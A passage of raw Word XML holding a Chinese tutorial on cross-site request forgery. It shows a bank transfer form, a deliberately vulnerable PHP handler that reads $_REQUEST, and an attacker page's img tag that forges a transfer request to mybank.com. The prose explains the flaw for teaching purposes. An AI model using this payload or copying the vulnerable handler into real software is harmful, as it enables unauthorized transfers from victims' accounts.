      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>form </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>action</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="Transfer.php"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t> method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="POST"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ToBankId: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>input </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="text"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t> name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="toBankId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>/&gt;&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Money: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>input </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="text"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t> name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="money"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>/&gt;&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>input </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="submit"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t> value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="Transfer"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>/&gt;&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</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后台处理页面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Transfer.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="3D81EE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
            <wp:docPr id="201" name="图片 4" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="189865" cy="189865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>session_start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>isset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$_REQUEST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>['toBankId'] &amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>isset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$_REQUEST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>['money']))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>    buy_stocks(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$_REQUEST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>['toBankId'],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$_REQUEST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>['money']);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="3D81EE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
            <wp:docPr id="200" name="图片 5" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="189865" cy="189865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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危险网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，仍然只是包含那句</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>img </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>=http://www.mybank.com/Transfer.php?toBankId=11&amp;money=1000&gt;</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和示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>中的操作一样，你首先登录了银行网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，然后访问危险网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>.....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>和示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>一样，你再次没了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>块～</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>T_T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，这次事故的原因是：银行后台使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>$_REQUEST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>去获取请求的数据，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>$_REQUEST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>既可以获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>请求的数据，也可以获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>请求的数据，这就造成了在后台处理程序无法区分这到底是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>请求的数据还是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>请求的数据。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>中，可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>$_GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>$_POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>分别获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>请求和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>请求的数据。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>中，用于获取请求数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>一样存在不能区分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>请求数据和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
